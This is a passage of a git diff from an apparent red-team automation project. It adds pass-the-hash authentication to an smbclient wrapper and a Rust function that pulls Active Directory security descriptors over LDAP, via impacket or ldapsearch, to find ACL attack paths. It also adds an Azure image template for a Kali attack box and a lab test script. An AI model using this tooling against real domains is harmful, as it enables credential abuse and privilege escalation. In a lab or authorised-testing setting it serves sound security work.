ntlm_hash.contains(':') { + ntlm_hash.rsplit(':').next().unwrap_or(ntlm_hash) + } else { + ntlm_hash + }; + let domain = optional_str(args, "domain"); + let username = optional_str(args, "username").unwrap_or("Administrator"); + let user_spec = match domain { + Some(d) => format!("{d}/{username}%{nt_hash}"), + None => format!("{username}%{nt_hash}"), + }; + cmd = cmd.flag("-U", user_spec).arg("--pw-nt-hash"); } else { let domain = optional_str(args, "domain"); let username = optional_str(args, "username").unwrap_or(""); @@ -573,6 +599,113 @@ pub async fn smbclient_kerberos_shares(args: &Value) -> Result { cmd.arg(format!("@{target}")).execute().await } +/// Enumerate ACL attack paths via LDAP nTSecurityDescriptor queries. +/// +/// Queries all user, group, and computer objects requesting nTSecurityDescriptor, +/// sAMAccountName, objectClass, and objectSid. The binary SD data is parsed +/// by the ntsd parser to identify dangerous ACEs. +/// +/// Required args: `target`, `domain` +/// Optional args: `username`, `password`, `bind_domain`, `hash` +pub async fn ldap_acl_enumeration(args: &Value) -> Result { + let target = required_str(args, "target")?; + let domain = required_str(args, "domain")?; + let username = optional_str(args, "username"); + let password = optional_str(args, "password"); + let bind_domain = optional_str(args, "bind_domain"); + let hash = optional_str(args, "hash"); + + let base_dn = domain_to_base_dn(domain); + let uri = format!("ldap://{target}"); + + // If hash is provided, use impacket LDAP for pass-the-hash + if let (Some(u), Some(h)) = (username, hash) { + let nt_hash = if h.contains(':') { + h.rsplit(':').next().unwrap_or(h) + } else { + h + }; + let ldap_query = format!( + r#"python3 -c " +import base64 +from impacket.ldap import ldap as ldap_mod +conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}') +conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}') +sc = ldap_mod.SimplePagedResultsControl(size=1000) +resp = conn.search( + searchFilter='(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))', + attributes=['sAMAccountName','objectClass','objectSid','nTSecurityDescriptor'], + searchControls=[sc], + sizeLimit=0, +) +for item in resp: + try: + dn = str(item['objectName']) + if not dn: + continue + print(f'dn: {{dn}}') + for attr in item['attributes']: + name = str(attr['type']) + for val in attr['vals']: + if name == 'nTSecurityDescriptor': + b = bytes(val) + print(f'nTSecurityDescriptor:: {{base64.b64encode(b).decode()}}') + elif name == 'objectSid': + b = bytes(val) + print(f'objectSid:: {{base64.b64encode(b).decode()}}') + else: + print(f'{{name}}: {{val}}') + print() + except Exception: + pass +" +"#, + target = target, + domain = domain, + u = u, + nt_hash = nt_hash, + base_dn = base_dn, + ); + return CommandBuilder::new("bash") + .args(["-c", &ldap_query]) + .timeout_secs(300) + .execute() + .await; + } + + // Password-based: use ldapsearch with LDAP_SERVER_SD_FLAGS_OID control + // to request DACL (value 4) in the nTSecurityDescriptor attribute + let mut cmd = CommandBuilder::new("ldapsearch") + .arg("-x") + .flag("-H", &uri) + .timeout_secs(300); + + if let (Some(u), Some(p)) = (username, password) { + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); + cmd = cmd.flag("-D", bind_dn).flag("-w", p); + } + + cmd = cmd + .flag("-b", &base_dn) + // Request DACL only via SD_FLAGS control (0x04 = DACL) + // BER: SEQUENCE { INTEGER 4 } = 30 03 02 01 04 → base64 MAMCAQQ= + .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="]) + .arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))") + .args([ + "sAMAccountName", + "objectClass", + "objectSid", + "nTSecurityDescriptor", + ]); + + cmd.execute().await +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + #[cfg(test)] mod tests { use super::*; @@ -595,6 +728,8 @@ mod tests { assert_eq!(domain_to_base_dn("local"), "DC=local"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; use serde_json::json; diff --git a/test.sh b/test.sh index 2181dfb4..63cac591 100755 --- a/test.sh +++ b/test.sh @@ -5,17 +5,22 @@ EC2_NAME="${EC2_NAME:-kali-ares}" TARGET="${TARGET:-dreadgoad}" BLUE_ENABLED="${BLUE_ENABLED:-1}" -echo "=== Deploying binaries to ${EC2_NAME} ===" -task -y ec2:deploy EC2_NAME="${EC2_NAME}" +echo "=== Stopping workers + any running operation ===" +task ec2:stop EC2_NAME="${EC2_NAME}" 2>/dev/null || true +task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true echo "" -echo "=== Stopping any running operation ===" -task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true +echo "=== Deploying binaries to ${EC2_NAME} ===" +task -y ec2:deploy EC2_NAME="${EC2_NAME}" echo "" echo "=== Wiping Redis ===" task ec2:exec EC2_NAME="${EC2_NAME}" CMD="redis-cli FLUSHALL" +echo "" +echo "=== Starting workers on fresh Redis with new binary ===" +task ec2:start EC2_NAME="${EC2_NAME}" + echo "" echo "=== Launching operation against ${TARGET} (blue=${BLUE_ENABLED}) ===" task -y red:ec2:multi TARGET="${TARGET}" EC2_NAME="${EC2_NAME}" BLUE_ENABLED="${BLUE_ENABLED}" diff --git a/warpgate-templates/templates/ares-golden-azure/warpgate.yaml b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml new file mode 100644 index 00000000..fd3ca6ec --- /dev/null +++ b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml @@ -0,0 +1,95 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/cowdogmoo/warpgate/main/schema/warpgate-template.json +metadata: + name: ares-golden-azure + version: 1.0.0 + description: Azure variant of the Ares golden image with all red team tools - recon, credential access, privesc, cracking, lateral movement, ACL abuse, and coercion + author: Dreadnode + license: MIT + tags: + - ares + - golden-image + - azure + - red-team + - reconnaissance + - credential-access + - privilege-escalation + - password-cracking + - lateral-movement + - acl + - coercion + requires: + warpgate: '>=1.0.0' + +name: ares-golden-azure +version: latest + +base: + image: kali-linux/kali/kali-last:latest + +provisioners: + # Install pipx + Ansible, then fetch the nimbus_range collection on the build VM. + # We re-clone in shell rather than using warpgate's `sources` + `type: file` + # pattern (see ares-golden-image) because Azure Image Builder expands `type: file` + # into one customizer per file and times out on the 2000+ file ansible/ tree. + # Token is passed via a credential helper so it never appears in the clone URL + # or AIB customizer logs; ref tracks the AMI variant. + - type: shell + inline: + - apt-get update + - apt-get install -y --no-install-recommends ca-certificates git procps sudo python3-apt python3-pip python3-venv pipx + - 'sed -i ''s|^PATH="|PATH="/root/.local/bin:/root/.cargo/bin:|'' /etc/environment || echo ''PATH="/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"'' > /etc/environment' + - pipx install --force uv + - pipx install --force ansible-core + - pipx ensurepath + - GITHUB_TOKEN=${GITHUB_TOKEN} git -c 'credential.helper=!f() { echo username=x-access-token; echo password=$GITHUB_TOKEN; }; f' clone --depth 1 --branch feat/more-attack-cov https://github.com/dreadnode/ares.git /tmp/nimbus_range + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/nimbus_range/ansible/. /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - rm -rf /tmp/nimbus_range + + # Attack Box - all red team tools + Alloy telemetry + # NOTE: Using shell instead of ansible provisioner because the playbook + # exceeds Azure VM Image Builder's customizer length limit when inlined. + # GPU drivers/CUDA are deferred to first-boot on GPU SKUs (cloud-init or + # systemd unit on the consuming VM) — Azure standard managed disks are + # too slow to do the 3GB+ cuda-toolkit + DKMS rebuild inside the AIB + # buildTimeout. apt hashcat is used instead of compiling from source + # for the same reason (the AWS variant has NVMe local storage, Azure + # D-series does not). + - type: shell + inline: + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force + - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cloud_provider=azure -e cracking_tools_gpu_support=false + + # Cleanup + - type: shell + inline: + - apt-get clean + - rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* + - echo "Ares golden azure build completed successfully" + +targets: + - type: azure + subscription_id: 70a9c8a4-6bc6-4a48-ae24-27996cea8c02 + location: centralus + resource_group: WARPGATE-TEST-RG + gallery: warpgateTestGallery + gallery_image_definition: ares-golden-azure + identity_id: /subscriptions/70a9c8a4-6bc6-4a48-ae24-27996cea8c02/resourcegroups/warpgate-test-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/warpgate-aib-uami + # D8s_v3 (8 vCPU) timed out at 360min on the full red-team toolchain; + # bumping to D16s_v3 for 2x parallelism. D8s_v5 capacity-restricted. + vm_size: Standard_D16s_v3 + source_image: + marketplace: + publisher: kali-linux + offer: kali + sku: kali-2026-1 + version: latest + plan: + name: kali-2026-1 + product: kali + publisher: kali-linux + image_tags: + Project: ares + Role: RedTeamAttackBox + ManagedBy: warpgate + Tools: recon,credential-access,privesc,cracker,lateral-movement,acl-abuse,coercion